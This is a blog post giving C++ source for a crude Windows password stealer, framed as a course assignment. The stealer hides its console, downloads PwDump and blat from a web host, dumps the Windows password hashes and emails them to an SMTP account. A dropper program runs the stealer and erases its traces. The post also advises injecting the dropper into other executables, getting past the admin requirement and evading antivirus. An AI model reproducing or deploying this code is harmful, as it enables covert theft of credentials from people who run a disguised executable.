A crude but simple password stealer

As I have explained earlier, I’ve had to write a crude password stealer as part of an information security course.

The right approach was to write the entire thing by myself, with the hash dump and smtp login coupled within my program. This however would take quite a lot of time, and between work and studies and my life, I was not in the right mood to write this myself. Thus, I’ve found myself looking at available tools of the trade and how to use them.
I decided to do it with two very simple command line tools, one being PwDump, a program that simply dumps your windows pass hashes. The other being blat, which despite it’s funny name (to us Russian speakers) is a very useful tool – It allows you to send files from the CLI via smtp. If you don’t see why you would need it, clearly you’ve never worked as a system administrator.

So, armed with those tools, I had now to find a way to combine them, within a single executable, run them and not be seen by the user.
My solution: write a C++ program that downloads the files from a web location, and runs them using the system command (I know there are better ways to do this, but remember, I wanted a quick and dirty way to hand in my assignment).

So, I came up with this piece of code:

#include "stdafx.h"
#include <tchar.h>
#include <urlmon.h>
#include <iostream>
using namespace std;

#pragma comment(lib, "urlmon.lib")

int _tmain(int argc, _TCHAR* argv[]) {
HWND hWnd = GetConsoleWindow();
ShowWindow( hWnd, SW_HIDE );
HRESULT hr = URLDownloadToFile ( NULL, _T("http://www.wasserman.me/blog/wp-content/uploads/2013/12/PwDump7.exe"), _T("Dump.exe"), 0, NULL );
hr = URLDownloadToFile ( NULL, _T("http://www.wasserman.me/blog/wp-content/uploads/2013/12/blat.exe"), _T("Mail.exe"), 0, NULL );
system("Dump.exe >> dump.txt");
system("Mail.exe dump.txt -server smtpcorp.com:2525 -u ***** -pw ******** -f ******@*********.** -to *******@**********.***");

return 0;

}

As you can see, it first of all hides the console window, then downloads pwdump and blat,
runs them, then exits.
It’s a rather simple piece of code, so I haven’t bothered to comment it even.

The problem is that the stealer itself doesn’t behave too well when injected into another file.
It still opens a console window for the dump and mail processes. So, how do we overcome it?
We write another program, that runs the stealer itself, this program called dropper is even simpler, and here’s how it looks:

#include "stdafx.h"
#include <tchar.h>
#include <urlmon.h>
#include <iostream>
using namespace std;
#pragma comment(lib, "urlmon.lib")

int _tmain(int argc, _TCHAR* argv[])
{

	HWND hWnd = GetConsoleWindow();
	ShowWindow( hWnd, SW_HIDE );
	HRESULT hr = URLDownloadToFile ( NULL, _T("http://www.wasserman.me/blog/wp-content/uploads/2013/12/stealer.exe"), _T("stealer.exe"), 0, NULL );
	system("stealer.exe");
	Sleep(30000);
	remove("stealer.exe");
	remove("Dump.exe");
	remove("Mail.exe");
	remove("dump.txt");
	return 0;
}

So, what now? Inject the dropper into another exe and let it run, it will clear after itself.
The caveat is, you have to ran said EXE as an administrator, but I’m sure you can overcome that hurdle.

If you for some crazy and insane reason, want to use this code yourself, you might want to fuzz PwDump as every AV will stop it from running.

So, there you go, a very simple password stealer written in less than 15 minutes, including time spent drinking coffee and contemplating my non-existent love life.

Leave a Reply

Your email address will not be published. Required fields are marked *